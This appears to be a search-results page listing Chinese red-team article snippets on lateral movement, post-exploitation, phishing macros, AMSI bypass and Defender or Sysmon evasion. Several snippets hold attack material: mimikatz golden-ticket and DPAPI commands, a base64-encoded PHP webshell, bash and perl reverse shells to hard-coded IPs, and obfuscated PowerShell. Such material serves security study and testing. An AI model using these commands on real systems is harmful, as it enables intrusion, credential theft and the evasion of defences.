首页
学习
活动
专区
圈层
工具
发布
    • 综合排序
    • 最热优先
    • 最新优先
    时间不限
  • 来自专栏Khan安全团队

    Tips

    在Windows上使用prtsc键时,taskhost/taskhostw会试图获得对一个不存在的文件的读取权限。

    33130编辑于 2022-04-02
  • 来自专栏Khan安全团队

    利器 - SharpSniper

    通常,参与不仅仅是实现域管理员。一些客户希望查看域中的特定用户是否会受到威胁,例如 CEO。

    34620编辑于 2022-07-13
  • 来自专栏渗透测试教程

    - 渗透小技巧

    这些有明显特征的 4.大框架类似,二次模改过来的,比如(onethink-->thinkphp) 5.报错关键字提取,去github找有没有相似源码以及类似函数,报错信息可以用google语法收集warning /hxd/axgg.xml 5..git svn如果觉得还原的不全,可以去kali重新试试,多下几个工具 6.日志 其他信息收集 1.c段,旁站,fofa搜索icon,header。 我们可以用profile=a看看能不能溢出2.f12里面搜索font,可能会出现密码) 3.同模版网站 4.护网的话,学校医院的学号和工号,可以根据“奖学金&&值班表” filetype等关键字搜索 5. 5.比如一个登录框,登陆的时候叫你选部门,可能账号密码处没有注入,但是你从人事部选择技术部这一步抓包,就会有注入。 4.看看有没有.user.ini这个文件,有的话走大运 5.白名单,这类没有解析漏洞或者开发商本身的漏洞,就别想着绕过了。

    1.7K40发布于 2021-07-23
  • 来自专栏Khan安全团队

    笔记 - 横向移动

    \Rubeus.exe monitor /interval:5 /nowrap 从攻击机器上,利用打印机漏洞诱使域控制器连接 . kerberos::golden /domain:currentdomain.targetdomain.com /sid:S-1-5-21-1874506631-3219952063-538504511 使用SID历史(/sids的)*-516和S-1-5-9以伪装的域控制器组和企业域控制器分别是在日志中的噪声低。 kerberos::golden /domain:currentdomain.targetdomain.com /sid:S-1-5-21-1874506631-3219952063-538504511 /sids:S-1-5-21-280534878-1496970234-700767426-516,S-1-5-9 /krbtgt:ff46a9d8bd66c6efd77603da26796f35 /

    2.4K10发布于 2021-10-12
  • 来自专栏HACK学习

    | Windows命名管道

    翻译就是:管道就是一部份共享内存以便进程可以用来相互通信,创建了Pipe内核对象的进程就是一个Pipe Server, 当另一个进程与这个进程创建的Pipe Server连接时,就称为Pipe Client.当一个进程往Piple当中写入信息时,另一个进程便可以从这个Pipe读出这个信息。

    2.5K20发布于 2021-06-24
  • 来自专栏HACK学习

    | InlineHook技术实现

    NULL || HookProc == NULL) { printf("地址填错了"); return 0; } if (num < 5) 存起来把原来的值 memset(HookAddr,0x90,num); //先全部nop //计算跳到我们自己函数的硬编码,E9后面的值 = 要跳转的地址 - E9的地址 - 5 DWORD JmpAddr = (DWORD)HookProc - (DWORD)HookAddr - 5; *(LPBYTE)HookAddr = 0xE9; *(PDWORD //等会的返回地址 dw_ifHOOK = 1; } 这里别忘了改属性,然后就是有个公式,JMP后面的值并不是我们真正想要去的地址 E9后面的值 = 要跳转的地址 - E9的地址 - 5, 用函数名传参的话得到的并不是真正的函数地址,但其实也是个间接地址嘛,JMP + 真正函数地址经过运算后的地址,我们还是用“E9后面的值 = 要跳转的地址 - E9的地址 - 5”这个公式算一下。

    78540发布于 2021-05-14
  • 来自专栏Gamma安全实验室

    技巧-网络钓鱼

    前言 涵盖了现在大多数钓鱼的手法,一直以来钓鱼配合免杀,更能出奇制胜! 1. excel宏执行任意命令 新建一个exel表,然后打开,对准这个右键点击插入宏。 ? 5. 自解压钓鱼 我这里就用刚刚改好的木马了,创建自解压文件: ? 点击高级,自解压选项,常规,设置自解压路径 ? 点击设置,设置解压后运行文件的路径 ? 模式选择全部隐藏 ?

    3.3K10发布于 2021-03-10
  • 来自专栏渗透测试红队专栏

    实战攻防(一)

    大家好,我是风起,最近一直在做安全研究及Kunyu的开发维护,已经好久没有写攻防相关的文章了,那么近期将带来 “实战攻防技术” 系列的文章。 当前行业内组织的 “蓝对抗演习” 在检验企业安全的同时也在磨练技术人员的技术水平,在近几年的演习中可以发现攻防双方的水准都有了极大的提升,本文将以的视角去阐述技术思想。 与常规的渗透测试相比,攻防更多的是渗透思想上的差异,而我个人的理解认为 “隐蔽”、“持久化”是最重要的思想,如何做到快速、高效的拿下目标,隐蔽、持久的进一步操作,也正是核心的差异所在。 熟悉我的读者,一定看过之前 “攻防基础建设” 相关的文章,本文也会串联之前知识点灵活的运用到实战场景下。 对于一些新晋的同学,风起哥建议首先做好基础建设,比如免杀、隐匿、工具特征改造、匿名VPS、邮箱、手机号、身份信息等,最好在纯净的虚拟机中进行渗透操作(别搁虚拟机里看什么腾讯视频)。

    1K50发布于 2021-08-23
  • 来自专栏Khan安全团队

    笔记 - 后渗透

    previous step) dpapi::masterkey /rpc /in:C:\Users\[USERNAME]\AppData\Roaming\Microsoft\Protect\S-1-5- Local\Microsoft\Credentials\1EF01CC92C17C670AC9E57B53C9134F3 /masterkey:91721d8b1ec[...]e0f02c3e44deece5f318ad

    1.3K41发布于 2021-10-12
  • 来自专栏全栈程序员必看

    靶机实战(2)

    一天一靶机 生活充实而有趣,打算这几天把红日的几个靶机都给撸个遍。打起来还挺有意思。

    68720编辑于 2021-12-13
  • 来自专栏Khan安全团队

    横向 - 神奇小妙招

    如果将恶意文件命名为 DumpStack.log,Defender 不会对其进行扫描。

    43320编辑于 2022-01-27
  • 来自专栏潇湘信安

    RequestTemplate内网渗透工具

    RequestTemplate是一款两端并用的渗透工具以及甲方自查工具,其在内网渗透过程中有着不可替代的作用。 客户端用Golang以其精巧、快速的特点打造而成,快速发现内网中脆弱的一环。 项目地址: https://github.com/1n7erface/RequestTemplate 0x01 应用场景 蓝对抗中的内网利器 甲方建设中内网的自查帮手 0x02 具备特点 网段探测

    1.7K30编辑于 2022-09-22
  • 来自专栏肖萧然最秀

    常用命令

    Jmx0Oz9waHANCkBlcnJvcl9yZXBvcnRpbmcoMCk7DQpzZXNzaW9uX3N0YXJ0KCk7DQogICAgJGtleT0iZTQ1ZTMyOWZlYjVkOTI1YiI7IA0KCSRfU0VTU0lPTlsmIzM5O2smIzM5O109JGtleTsNCgkkcG9zdD1maWxlX2dldF9jb250ZW50cygicGhwOi8vaW5wdXQiKTsNCglpZighZXh0ZW5zaW9uX2xvYWRlZCgmIzM5O29wZW5zc2wmIzM5OykpDQoJew0KCQkkdD0iYmFzZTY0XyIuImRlY29kZSI7DQoJCSRwb3N0PSR0KCRwb3N0LiIiKTsNCgkJDQoJCWZvcigkaT0wOyRpJmx0O3N0cmxlbigkcG9zdCk7JGkrKykgew0KICAgIAkJCSAkcG9zdFskaV0gPSAkcG9zdFskaV1eJGtleVskaSsxJjE1XTsgDQogICAgCQkJfQ0KCX0NCgllbHNlDQoJew0KCQkkcG9zdD1vcGVuc3NsX2RlY3J5cHQoJHBvc3QsICJBRVMxMjgiLCAka2V5KTsNCgl9DQogICAgJGFycj1leHBsb2RlKCYjMzk7fCYjMzk7LCRwb3N0KTsNCiAgICAkZnVuYz0kYXJyWzBdOw0KICAgICRwYXJhbXM9JGFyclsxXTsNCgljbGFzcyBDe3B1YmxpYyBmdW5jdGlvbiBfX2ludm9rZSgkcCkge2V2YWwoJHAuIiIpO319DQogICAgQGNhbGxfdXNlcl9mdW5jKG5ldyBDKCksJHBhcmFtcyk7DQo >/dev/tcp/172.16.1.130/4444;cat <&5|while read line;do $line >&5 2>&1;done perl perl -e 'use Socket;$ >/dev/tcp/10.0.0.1/2002;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[]) p.waitFor( msf提供了如下几个模块帮助绕过UAC: msf5 auxiliary(server/socks5) > search bypassuac Matching Modules ============= meterpreter > background [*] Backgrounding session 13... msf5 auxiliary(server/socks5) > use exploit/

    5.1K50编辑于 2023-10-13
  • 来自专栏FreeBuf

    渗透项目之GoldenEye

    接下来不管是零基础学习渗透者,还是有些基础的渗透者,甚至是高水平的渗透人员读该文章都能学习到一些的技巧和知识。 Burpsuiter解密HTML:kali自带Burpsuiter工具 在Burpsuiter打开后在Decoder处进行HTML破解获取 最终账号密码:boris/InvincibleHack3r 55、暴力破解doak用户 和之前暴力破解一样的性质,继续暴力破解doak用户。 或者用strings获取jpg文件底层内容:strings for-007.jpg 用以上命令都可以查看到base64编码隐藏信息:eFdpbnRlcjE5OTV4IQ== 9、Base64解码 使用 五、总结 通过以上的学习,我们认知了一些的小技巧的技术手段,完成了从信息收集到内核提权项目落地,学习到了非常多的技巧,例如nmap、hysra、pop3-nc、MSF、EXP等等的编译和使用提权等,

    2K20编辑于 2022-02-23
  • 来自专栏FreeBuf

    技巧:仿冒Windows登录

    Metasploit带有内置的后期漏洞利用功能,可帮助我们完成任务。由于它是后渗透的模块,因此只需要输入会话即可:

    2K10发布于 2020-05-29
  • 来自专栏Khan安全团队

    笔记 - PowerShell AMSI Bypass

    GET`TY`Pe"(( "{6}{3}{1}{4}{2}{0}{5}" -f'Util','A','Amsi','.Management.','utomation.' 目的 Invoke-CradleCrafter 的存在是为了帮助蓝轻松探索、生成和混淆 PowerShell 远程下载托架。

    1.3K20发布于 2021-10-12
  • 来自专栏Gamma安全实验室

    技巧-常规横向手法

    前言 域内横向移动技术是作战在域内最基本技术之一,人员会利用该技术,以被攻陷的系统为跳板,通过已经收集的凭据和密码,来访问域内其他主机,扩大战果,最终目的是获取到dc的访问控制权限。 Gamma.bat \\\192.168.75.131\c$ #bat里面放入反弹shell的powershell命令,或者什么 在目标主机上创建用户: at \\\192.168.75.131\ 5: bindshell binpath= "c:\Gamma.exe" 4.立即启动该服务: sc \\WIN-ENS2VR5TR3N start bindshell 5.使用完后删除刚才创建的服务 sc 5.通过FSO组件访问远程共享文件夹中的结果文件,将结果输出。 6.当结果读取完成时,调用WMI执行命令删除结果文件,最后当WMIEXEC退出时,删除文件共享。 5.VISIO ADDON EXECUTION 虽然不是默认Office安装的一部分,因此没有普及,但Visio提供了可用于横向移动的DCOM对象。 创建Visio对象的实例。

    2.8K20发布于 2021-07-01
  • 来自专栏Khan安全团队

    笔记 - 后渗透2

    在我们的攻击机器上(本例中为Linux),我们以反向SOCKS5模式在80端口启动一个Chisel服务器。 sudo . /chisel server -p 80 --reverse --socks5 在我们被攻击的目标系统上,我们连接到这个服务器,并告诉它通过反向SOCKS5隧道代理所有流量。 .

    88520发布于 2021-10-12
  • 来自专栏FreeBuf

    技巧:绕过Sysmon检测

    Sysmon和Windows事件日志都是防御者中极为强大的工具。它们非常灵活的配置使他们可以深入了解设备上的活动,从而使检测攻击者的过程变得更加容易。出于这个原因,我将带领您完成击败他们的旅程;)

    1.6K20发布于 2020-05-14
  • 来自专栏鸿鹄实验室

    技巧--winAPI添加用户

    在平时的渗透过程中我们经常会使用net来添加用户,但也会经常遇到net无法使用的情况,这里就教大家使用winAPI来添加用户,虽然也是一个比较老的技巧了。

    1.5K20发布于 2021-04-15
领券